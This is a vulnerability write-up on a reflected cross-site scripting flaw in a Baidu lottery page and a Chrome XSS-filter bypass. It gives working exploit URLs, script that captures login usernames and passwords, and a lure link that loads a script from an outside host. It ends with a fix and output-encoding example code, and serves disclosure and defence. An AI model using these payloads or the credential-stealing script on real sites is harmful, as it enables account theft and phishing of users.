A cross-site scripting (XSS) vulnerability in Baidu that bypasses Chrome's XSS filter
It also works as a Chrome XSS filter bypass case, so it is worth walking through.
Today I opened the Baidu homepage and saw that I could enter a lottery draw, so I clicked through and had a look:
http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&wd=xx&nowType=lottery&site=iqiyi
After half a day I still had not won anything, so I started poking at the page instead and found an XSS. Testing the parameters
type=video&wd=xx&nowType=lottery&site=iqiyi
shows that none of them filter double quotation marks. Unfortunately, the reflected input is still intercepted by Chrome's XSS filter, so the Chrome "complex parameter" bypass vector is needed here.
I will focus on the last three parameters. The site value is reflected as a class value and is output in two different places.
http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&wd=xx&nowType=lottery&site=iqiyi%27%22xxx
The value is output in two places, neither of them filtered.
The usual XSS payloads are intercepted by the Chrome filter.
So how can it be bypassed?
A vector I had studied earlier, for a single variable that is output in two different places, can get past the Chrome filter:
"><img src='onerror=alert(1)
http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&wd=xx&nowType=lottery&site=iqiyi%22%3E%3Cimg%20src=%27onerror=alert(1)
However, what follows the output point, .png), ends up inside the injected code and causes a syntax error. Can // be used to comment out the trailing code? No: testing shows the request is intercepted as soon as a / is added, so Chrome is still doing its job there.
After some thought an idea came: since the content after the class value cannot be commented out, it can be closed off syntactically instead, so that nothing throws an error.
Finally, the following link is constructed:
http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&wd=xx&nowType=lottery&site=iqiyi%22%3E%3Cimg%20src=x%20onerror=x={png:1};(function(){alert(location.href)})(x
The trailing .png) from the original attribute value completes the injected expression as (x.png), so the script runs without error. The result, shown as a screenshot in the original post, is the alert with location.href: the code was closed successfully.
Next comes hijacking the user's account name and password (only the not-logged-in case; I was too lazy to write the logged-in one). The hijacking code is as follows:
var pass = "";
// ids of the Baidu login form fields as named in the original; their separators and casing are garbled there, so this exact form is assumed
TANGRAM__PSP_9__password.onblur = function () { pass = this.value; };
TANGRAM__PSP_9__submit.onclick = function () {
  alert('by xiangcao username:' + TANGRAM__PSP_9__userName.value + ' password:' + pass);
};
// sending the captured values out is left unwritten here
Finally, the link is constructed and sent out as the following anchor (shown here decoded from the HTML-escaped form in the original):
<a href="http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&amp;wd=xx&amp;nowType=lottery&amp;site=iqiyi&quot;&gt;&lt;img%20id=x%20alt=with(body)appendChild(createElement(/script/.source)).src=&quot;//qqq.si/soPurw&quot;%20src=%27%20onerror=x={png:1};(function(){eval(alt)})(x">hundreds of times of welfare benefits, come and grab it</a>
Result
Solution: filter the reflected parameters before they are output into the page.
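What "filter" has to mean for this endpoint, as an added example that is not Baidu's code: context-aware output encoding of the reflected site value, plus an allow-list as the stricter alternative. The template, the allow-list contents and the /img/ path are assumptions that only mirror the two output points the post describes (a class value and an image src ending in .png).

```javascript
// Added example, not Baidu's code: output encoding for the reflected `site`
// parameter at both places where the lottery page reflects it.
const ATTR_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
};

// Escape every character that can terminate a quoted HTML attribute or open a
// tag, so the value can never leave the attribute it is written into.
function escapeHtmlAttr(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ATTR_ESCAPES[ch]);
}

// Stricter alternative for this endpoint: `site` names a partner site, so an
// allow-list removes the reflection of attacker-controlled text altogether.
// The list is constructed for this example; the real set of partners is unknown.
const ALLOWED_SITES = new Set(['iqiyi']);

function normalizeSite(value) {
  return ALLOWED_SITES.has(value) ? value : 'iqiyi'; // fall back to a known value
}

// Hypothetical rendering of the page fragment, escaping at both output points
// (the class value and the image src that ends in .png).
function renderLotteryFragment(site) {
  const safe = escapeHtmlAttr(site);
  return `<div class="site-${safe}"><img src="/img/${safe}.png"></div>`;
}

// Count raw double quotes in the rendered markup. The template itself emits
// exactly four; any extra one means user input broke out of an attribute.
function rawQuoteCount(html) {
  return (html.match(/"/g) || []).length;
}
```

Fed the post's own site value with the closing-off payload, the rendered fragment keeps its four template quotes and the injected text survives only as &quot;&gt;&lt;img ... inside the attribute.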